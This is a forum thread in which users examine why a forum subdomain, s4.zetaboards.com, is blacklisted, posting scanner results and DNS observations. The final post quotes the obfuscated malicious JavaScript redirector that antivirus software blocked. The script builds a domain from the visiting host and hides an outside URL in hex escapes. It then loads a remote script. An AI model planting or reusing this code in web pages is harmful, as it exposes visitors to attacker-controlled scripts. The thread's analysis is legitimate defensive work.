I found something interesting again.

One old forum I’ve visited regulairly is under domain “s4.zetaboards.com” which seems to be blacklisted by Norton Safe Web. When full forum index link is incerted into Sucuri Sitecheck, it shows Norton blacklist and “Site likely compromised”. When only “s4.zetaboards” is inserted, Sucuri seems to auto correct it into just “zetaboards.com” which seems clean by Norton.

Alerts:

https://sitecheck.sucuri.net/results/s4.zetaboards.com/stuckheadfirstforum/index/

http://safeweb.norton.com/report/show?url=s4.zetaboards.com

Compare to:

http://safeweb.norton.com/report/show?url=zetaboards.com

https://sitecheck.sucuri.net/results/s4.zetaboards.com

You see that the sub-domain is a bad zone domain when you try to do a DNS scan.
And the issue apparently is with CloudFlare hosting this sub-domain, see: http://toolbar.netcraft.com/site_report?url=s4.zetaboards.com And here you are served up with all the problems for this sub-domain: http://mxtoolbox.com/domain/s4.zetaboards.com/ It rediects now to zetaboards.com source is empty

The other is a registered and active website domain: http://whois.domaintools.com/zetaboards.com
but also with these problems: http://mxtoolbox.com/domain/zetaboards.com/
This seems OK-> http://www.dnsinspect.com/zetaboards.com/1445010624
Tracking goes on via -z3.ifrm.com - Z3.ifrm.com does not use HTTP Secure, so all communications are not encrypted.
It is always a good practice to do online shopping, online transaction with only HTTPS website, as all the information is securely encrypted and cannot be intercepted.

polonus (volunteer website security analyst and website error-hunter)

Pardon if I got it wrong, but were you saying that scanning a subdomain could give false information?

Other zetaboards sub-domain scans I tried didn’t seem to get threats or blacklists.

I checked zetaboards.com in google safe browsing and it got some threats too.

https://www.google.com/safebrowsing/diagnostic?site=zetaboards.com

The negative side here is that all changes in the zone and the subdomain zone require a zone.reload.
Something at Cloudflare did notdo right, not only that bulk subdomains on bulk sub.domain hosters can be abused so the attackers can abuse the free subdomains for their nefarious ends on Dynamic DNS. Read for some backgrounds here: https://labs.opendns.com/2013/04/15/on-the-trail-of-malicious-dynamic-dns-domains/
Also read this: http://www.sabi.co.uk/Notes/linuxDNSZones.html
Cloudflare & Baidu, consider this: https://gigaom.com/2015/09/21/great-catastrophe/

polonus

Hello.

Detection is correct JS:Redirector-BGS [Trj]
Avast blocks the following malicious code

< / script > < script type="text/javascript" language="javascript"> document.write ('< ' + ' script type="text/javascript" language="javascript" id="ajh7f1x3qe"> < /' + ' script > '); var j = document.getElementById("ajh7f1x3qe"); var s = document.location.host; var s1 = ""; var qcl2q = 10; for (var i = 0; i < s.length; i++) { var r8j8tnwtk76gj = s.charCodeAt(i) + qcl2q; r8j8tnwtk76gj = 65 + (r8j8tnwtk76gj % 57); s1 += String.fromCharCode(r8j8tnwtk76gj); qcl2q = s.charCodeAt(i);} s1 = s1.replace(/[^a-zA-Z0-9]/g, ""); if( document.cookie.indexOf("google_api=1;") == -1 ) {j.src = "\x68\x74t\x70\x3a\x2f\x2f"+s1+".p\x65\x67\x75a\x72\x64\x73\x2ec\x63/\x625\x31a\x64\x39\x66\x62i\x71\x2f\x67et\x2e\x6as";} delete s; delete s1;

Domain in Blacklist
http://www.urlvoid.com/scan/s4.zetaboards.com/

also pointed found out by other solutions antivírus.

Result

https://www.virustotal.com/en/file/48f426a262077b15218cffde4aa1eec117596d4401b90848ea04ccc8ae04df3f/analysis/1445129174/